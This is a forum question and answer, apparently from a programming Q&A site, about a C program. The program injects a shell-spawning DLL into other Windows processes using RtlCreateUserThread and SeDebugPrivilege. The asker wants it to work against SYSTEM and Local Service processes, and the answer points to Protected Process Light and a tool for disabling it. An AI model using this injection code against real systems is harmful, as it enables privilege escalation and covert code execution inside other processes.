# Dll injection with RltCreateUserThread

Tags: dll-injection

i have written a program to inject dll.
i am using RltCreateUserThread. can someone tell me what i am doing wrong in here. I am able to inject the dll in processes but the injected dll spawns a cmd shell when injected to a process that is same as my current privileges but when i inject them into System/Local Service account processes it doesnot spwan a shell. i am using cmd.dll from Didier Stevens site which is from ReactOS. I am trying to do it from Windows 7 32 Bit.

```
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>


typedef struct _CLIENT_ID
  {
    PVOID UniqueProcess;
    PVOID UniqueThread;
  } CLIENT_ID, *PCLIENT_ID;

typedef long (*_RtlCreateUserThread)(HANDLE,
    PSECURITY_DESCRIPTOR,
    BOOLEAN,ULONG,
    PULONG,PULONG,
    PVOID,PVOID,
    PHANDLE,PCLIENT_ID);

_RtlCreateUserThread RtlCreateUserThread;

int main(){
    HANDLE hThd, hModule;
    CLIENT_ID cid;
    DWORD pid;
    char * dll="cmd.dll";


HMODULE ntdll=LoadLibrary("ntdll.dll");
HMODULE k32=LoadLibrary("kernel32.dll");

RtlCreateUserThread=GetProcAddress(ntdll,"RtlCreateUserThread");
printf( "Enter pid :");
scanf("%u", &pid);

LUID luid;
HANDLE token_handle;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid);
TOKEN_PRIVILEGES tp;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&token_handle);
AdjustTokenPrivileges(token_handle,false,&tp,sizeof(tp),NULL,NULL);



HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
LPVOID vaex=VirtualAllocEx(hProc,NULL,strlen(dll) + 1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc,vaex,dll,strlen(dll),NULL);
RtlCreateUserThread(hProc,NULL,false,0,0,0,(PVOID)GetProcAddress(k32,"LoadLibraryA"),vaex,&hThd,&cid);
WaitForSingleObject(hThd,INFINITE);

CloseHandle(hThd);
CloseHandle(hProc);

FreeLibrary(k32);
FreeLibrary(ntdll);

return 0;
}
```

thanks,
Raja.

Answer (score 0):

You cannot inject into system processes which have Protected Process Light protection.

Read [Evolution of PPL](https://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-hash-mitigations-windows-81/) and [PPL Killer](https://github.com/Mattiwatti/PPLKiller)

This is a new protection mechanism since Windows 8/8.1